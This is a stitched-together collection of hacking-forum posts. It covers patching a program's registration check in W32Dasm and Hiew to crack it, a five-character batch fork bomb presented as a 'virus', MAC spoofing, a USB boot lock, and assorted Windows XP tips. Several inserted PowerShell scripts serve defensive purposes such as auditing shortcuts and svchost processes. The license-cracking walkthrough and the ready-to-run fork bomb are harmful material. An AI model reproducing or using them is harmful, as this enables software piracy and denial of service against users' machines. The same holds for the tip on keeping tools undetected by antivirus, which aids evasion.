Disassemble the program. Good, small is fast :-) Always.... Now, we don't have any strings that pop up when we want to
register something... Let's browse the string references for things like registered, unregistered, the string about the unsaved settings. Hmm...
evaluation time left ... password.txt.... passworddialog.... sweet little piano - Unregistered <<-- looks like our caption bar ;-)
go on... Thanks for registering ... cool! So it thanks you anyway :-) Let's jump to that place ... Double-click on it and we will pop
right on top of the registration routine...

Step 3: Analyzing the protection routine.... / Understanding the jumping Mechanism...

Let's analyze the protection routine.


PasswordDialog... a call to GetDlgItemTextA... another call.... a test... and depending on the test a je.... The je jumps over the thank you... and just ends the dialog box... without telling you that you entered something wrong... So this is right... we indeed did not see that we typed something wrong... but apparently we are supposed to see if we type something right.

Again execute the je jump, and look where it goes to... return from the jump.... Now let's try to rewrite what goes on here...

call ShowPasswordDialog
call GetEnteredText
call IsEnteredTextGood
test value in eax
je QuietExit

ShowThanksForRegistering

QuietExit:

The source code must have looked like this:

GetDlgItemText(_ID_Serial);
if (EnteredTextGood) ShowThanksForRegistering();

// else nothing....

This is another interesting piece of code.... test eax, eax... this assembler instruction ANDs eax with itself without storing the result, so it only sets the flags: the zero flag is set exactly when eax is zero. A je jumps when the zero flag is set, so here it jumps when eax is zero and does not jump when eax is non-zero.... To crack this program we can change the je instruction into two nop instructions... and we are done...

We have seen here that the call has put a value in eax.... either zero or something non-zero... In our previous
example we saw that the called Is_Serial_Valid call set some value in memory... Here we see that the called
Is_Serial_Valid call sets the eax register of our processor to some value....

Step 4: Changing the original program...

So modify it :-)

1. Open Hiew.
2. Open the file within Hiew.
3. Find the address of the line in W32Dasm (it's on the status bar, beginning with '@').
4. Press F5 in Hiew.
5. Enter the address you have found in (3) and press ENTER.
6. Press F3 - for activating the write option.
7. Press F2 - to change the instruction.
8. Replace the command by 'NOP' (without quotes), which means NO OPERATION.
9. Now a new command appears in the next line.
10. Replace it by NOP too.
11. If another new instruction hasn't appeared, press F9 to update the file.
12. Press F10 to exit.
13. Run the program and see the result.

Anti- Shortcut Virus


If your flash drive (pen drive) is infected with a shortcut virus, follow these steps.

Click on "Start" -->Run.

Here I assume your flash drive letter is G:

Enter this command.

attrib -h -r -s /s /d g:\*.*

Copy the above command and paste it into Run.

Note: Don't forget to replace the letter g with your flash drive letter.

Now press "Enter".

Now check for your files in Flash Drive.
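The attrib command above only makes the hidden files visible again; it does not tell you which of the shortcuts on the drive are the malicious ones. The PowerShell script below is an added example (not part of the original post): it strips the same three attributes that attrib -h -r -s removes, then lists every .lnk file on the drive with its real target and argument string, so shortcuts that launch cmd.exe or wscript.exe with an odd argument string stand out before anyone double-clicks them. The drive letter G: is the same assumption the post makes; WScript.Shell is the standard Windows Script Host COM object.

```powershell
# Added example: recover from a "shortcut virus" on a removable drive and
# list the targets of all shortcuts found there. Drive letter is an assumption.
param([string]$Drive = "G:")

# Same attributes that "attrib -h -r -s /s /d G:\*.*" clears.
$clearMask = [IO.FileAttributes]::Hidden -bor
             [IO.FileAttributes]::System -bor
             [IO.FileAttributes]::ReadOnly

# Walk every file and folder on the drive (-Force includes hidden items)
# and remove the Hidden, System and ReadOnly bits.
Get-ChildItem -LiteralPath "$Drive\" -Recurse -Force | ForEach-Object {
    $_.Attributes = $_.Attributes -band (-bnot $clearMask)
}

# Resolve each shortcut's target with the Windows Script Host COM object,
# so the report shows what the .lnk would actually run.
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -LiteralPath "$Drive\" -Recurse -Force -Filter *.lnk | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    [pscustomobject]@{
        Shortcut  = $_.FullName
        Target    = $lnk.TargetPath
        Arguments = $lnk.Arguments
    }
} | Format-Table -AutoSize
```

Run it from an elevated PowerShell prompt as .\unhide.ps1 -Drive "G:". A legitimate shortcut to a document points at that document; a shortcut whose Target is a command interpreter and whose Arguments reference a file you did not create is the one to delete, together with the file it references.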

Smallest Virus


A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.




A fork bomb is considered to be the smallest writable virus in the batch language. On a home computer it is merely annoying; on a server it will probably result in a crash.
A fork bomb creates two instances, each of which creates two instances, and so on: the processes recursively fork, which "forks" the processor and jams it completely until a crash occurs.
Here is how to make it:
Open up Notepad and type:
%0|%0
and save it as fork.bat. Yep, it's a virus of just 5 characters :P
On double clicking this file, it will lead to a total CPU jam by opening about 500+ command prompt processes.

10 ways to a better Security


(1) Always scan your files at http://scanner.novirusthanks.org/ (tick "Do not distribute the sample") or http://www.virustotal.com/

(2) Sandbox everything and use anti-malware.

(3) Make a VMW (VMware Workstation virtual machine).

(4) Use a keyscrambler in your VMware VM.

(5) Use Firefox; always delete cookies and history after closing; never save passwords.

(6) If you are going to hack, use a VPN (virtual private network).

(7) If you're buying some software from a user, make sure you research him:
read his threads, ask a friend, read the scam page, send the money as a gift on PayPal.

(8) If something looks too good to be free, it's not; it's most likely backdoored.

(9) Never download from a telnet; no-no = people with 10 posts.

(10) Add a firewall and antivirus guard in your VMware Workstation VM.

(11) Add a firewall and antivirus guard on your PC outside your VMware Workstation; use a scrambler and sandbox everything.

(12) Buy a 5TB external hard drive and back up everything (scan files before adding).

(13) One of the important factors in keeping tools undetected from antiviruses

How To Lock Your Computer With USB Drive


Tired of people starting your computer when you are not around and messing up custom settings? Wouldn’t it be cool if you could lock your computer by just removing your USB stick from it? I’ll show you how you can use your USB stick, Flash Drive or Pen Drive what ever you call it to lock your computer, among other things…

Boot Lock
This trick will allow you to use your USB stick to boot into Windows. If someone tries to start the computer without your USB stick, it will display boot errors. Before you begin: playing with the BIOS and boot files of your computer may result in you not being able to boot into your Windows partition, so continue at your own risk! Things you need: a 64MB or larger USB stick, and a Windows recovery disk (just in case).

Unhide hidden and protected files: go to Tools > Options > View, check Show hidden files and un-check Hide protected system files.

From the drive where Windows is installed (normally C:\), copy the files boot.ini, ntldr and NTDETECT.COM to your USB stick.
Now we need to go into your BIOS, so restart the computer and keep jabbing [F8] as soon as the computer starts.
Once in the BIOS, enable the USB drive as the first boot device. You might have to enable USB Legacy Support on older BIOSes.
Restart your computer. If all goes well, you should be able to log into Windows. If not, unplug the USB stick, return to the BIOS, change the first boot device back to your hard disk drive and repeat the steps above.
Once you are logged into Windows, go to your Windows drive and rename boot.ini to boot.bak.
To check that you have set up everything correctly, eject your USB stick and reboot the computer. You should get error messages on the screen such as “Invalid Boot.ini” or “Windows could not start”.
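The risky step in this procedure is renaming boot.ini: once that is done, the machine boots only if the USB copies of all three files are complete and intact. The script below is an added example, not part of the original post, and performs that check before you rename anything: it confirms each of the three boot files exists on the stick and has the same SHA-256 hash as the original on the Windows drive. The drive letters C: and E: and the function name are my assumptions; the hash is computed with the .NET SHA256 class so the script also runs on the old PowerShell 2.0 found on XP-era systems.

```powershell
# Added example: verify that boot.ini, ntldr and NTDETECT.COM were copied to
# the USB stick byte-for-byte before boot.ini is renamed on the Windows drive.
# Drive letters are assumptions; change them to match your system.

function Get-Sha256Hex {
    param([string]$Path)
    # .NET hashing works on PowerShell 2.0 too, unlike Get-FileHash (PS 4+).
    $sha   = [System.Security.Cryptography.SHA256]::Create()
    $bytes = $sha.ComputeHash([IO.File]::ReadAllBytes($Path))
    ($bytes | ForEach-Object { $_.ToString("x2") }) -join ""
}

function Test-BootFileCopy {
    param(
        [string]$WindowsDrive = "C:",
        [string]$UsbDrive     = "E:"
    )
    $files = "boot.ini", "ntldr", "NTDETECT.COM"
    $ok = $true
    foreach ($name in $files) {
        $src = Join-Path "$WindowsDrive\" $name
        $dst = Join-Path "$UsbDrive\" $name
        if (-not (Test-Path -LiteralPath $dst)) {
            Write-Warning "$dst is missing"
            $ok = $false
            continue
        }
        if ((Get-Sha256Hex $src) -ne (Get-Sha256Hex $dst)) {
            Write-Warning "$dst differs from $src"
            $ok = $false
        }
    }
    return $ok
}

if (Test-BootFileCopy -WindowsDrive "C:" -UsbDrive "E:") {
    Write-Output "USB copy verified; it is safe to rename boot.ini."
} else {
    Write-Output "Fix the copy first; do NOT rename boot.ini yet."
}
```

Run the script after copying the files and before renaming boot.ini; if it prints a warning, copy the named file again and rerun. Keep the recovery disk the post mentions at hand regardless, since the check covers the files but not the BIOS boot-order change.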

All About IP address part-2


There are two ways to change your MAC address on Windows: the easy way and the hard way. I'll discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it works if your NIC (Network Interface Card) supports cloning your MAC address. If this is the case, then you go to:

Start > Control Panel > Network Connections

Right click on your NIC and go to Properties. Then click the button labeled Configure. It should bring up another form. Click on the Advanced tab. Under Property you should see "Locally Administered Address" or "Network Address". Click the radio button next to the text box, and type in your new MAC address (note: you do not use the "-" when you enter your new MAC address).

To check and see if it worked or not go to

Start > Run > and type in "cmd"

When the terminal comes up issue the command.

ipconfig /all
-----------------------------------------------------------------------------------------------------------------------------------------------

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in "cmd"

Once the terminal comes up type in

"net config rdr"

It should bring up a lot of things, but what you are interested in is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write them down somewhere, since you will need them later.

After you are done with that go to

Start > Run > and type in "regedt32"

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the "NetCfgInstanceId" value with the number you wrote down earlier. Once you find a match, double click on the value "NetworkAddress" and change it to your new MAC address. Hit OK and reboot your system.
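The same registry key is also where a defender looks to find out whether an adapter's MAC address has been overridden: a NetworkAddress value under the adapter's 00xx subkey means the address the NIC presents on the wire is not its burnt-in one. The PowerShell function below is an added example, not part of the original post; it walks the class key named above, reads NetCfgInstanceId, DriverDesc and NetworkAddress from each adapter instance, and returns only the adapters that carry an override. The function name is mine; the key path and value names are the ones the post uses.

```powershell
# Added example: audit the network-adapter class key for MAC address
# overrides (a NetworkAddress value present under an adapter's 00xx subkey).
function Get-MacAddressOverride {
    $classKey = "HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}"

    Get-ChildItem -Path $classKey -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d{4}$' } |   # only the 0000, 0001, ... instances
        ForEach-Object {
            $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Instance         = $_.PSChildName
                Description      = $p.DriverDesc
                NetCfgInstanceId = $p.NetCfgInstanceId
                NetworkAddress   = $p.NetworkAddress    # $null when no override is set
            }
        } |
        Where-Object { $_.NetworkAddress }                  # keep only overridden adapters
}

Get-MacAddressOverride | Format-Table -AutoSize
```

Reading HKLM needs no elevation, so this runs as a normal user. On Windows 8 and later you can cross-check the result against Get-NetAdapter, whose MacAddress and PermanentAddress properties show the address in use and the hardware address side by side; the NetCfgInstanceId reported here matches the adapter's InterfaceGuid.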




There are several ways you can determine your IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that you can send the information to a text file (IPCONFIG /ALL > c:\ip.txt).
But sometimes the window shows so much information that you need to scroll around to find it.

VIEW STATUS

Control Panel / Network Connections / Double click the icon for your network (if the network has an icon in the system tray, you can also just double click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When you try to send pictures through e-mail, you should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If you would like to create an icon to suspend your computer:

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name you want
Now when you click on that shortcut, your computer will shut down and suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, you are only allowed to create administrators or limited users.
If you want to create

Right click on My Computer
Manage
Local Users and Groups
Users
Right click on the user you want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here you see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::






some more
Determining Which Services are Associated with SVCHOST

Since so many critical services are run with each svchost,
you can see which ones are being used by opening a cmd prompt and running:

tasklist /svc /fi "imagename eq svchost.exe"

Note: This is available only with XP Pro
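Knowing which services each svchost.exe hosts is also how you catch a process that only borrows the name: a genuine svchost.exe hosts at least one registered service and runs from the System32 (or, on 64-bit Windows, SysWOW64) folder. The PowerShell function below is an added example, not part of the original post; it builds the same PID-to-services map that tasklist /svc prints, using the ProcessId that Win32_Service records for each service, and flags any svchost.exe that hosts no service or runs from an unexpected path. The function name is mine.

```powershell
# Added example: map every svchost.exe process to the services it hosts
# (what "tasklist /svc /fi "imagename eq svchost.exe"" shows) and flag
# processes that host nothing or run from outside the Windows system folders.
function Get-SvchostServiceMap {
    $expectedPaths = @(
        (Join-Path $env:SystemRoot "System32\svchost.exe"),
        (Join-Path $env:SystemRoot "SysWOW64\svchost.exe")
    )

    # Win32_Service carries the PID of the process hosting each running service;
    # group the services by that PID (string keys for easy lookup).
    $byPid = Get-CimInstance Win32_Service |
        Where-Object { $_.ProcessId -ne 0 } |
        Group-Object -Property ProcessId -AsHashTable -AsString

    Get-Process -Name svchost -ErrorAction SilentlyContinue | ForEach-Object {
        $services = @()
        if ($byPid -and $byPid.ContainsKey([string]$_.Id)) {
            $services = @($byPid[[string]$_.Id] | ForEach-Object { $_.Name })
        }
        $path = $_.Path   # $null when the caller is not allowed to read the image path

        [pscustomobject]@{
            PID        = $_.Id
            Path       = $path
            Services   = ($services -join ", ")
            Suspicious = ($services.Count -eq 0) -or
                         ($path -and ($expectedPaths -notcontains $path))
        }
    }
}

Get-SvchostServiceMap | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Run it from an elevated prompt so that Path is populated for every process; without elevation the image path of system processes is blank and only the "hosts no service" test applies. A Suspicious entry is a starting point for a closer look (verify the image's signature and parent process), not a verdict on its own.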
:::::::::::::
Identify Faulty Device Drivers

If you are having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verifier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers you want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If your computer stops with a blue screen, you should get an error message naming the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If you want to see a list of installed drivers, you can run the driverquery program.
There are a lot of available switches to view different types of information.
One use can be to export to a CSV file for viewing in Excel.
An example would then be:

Driverquery /v /fo csv > drivers.csv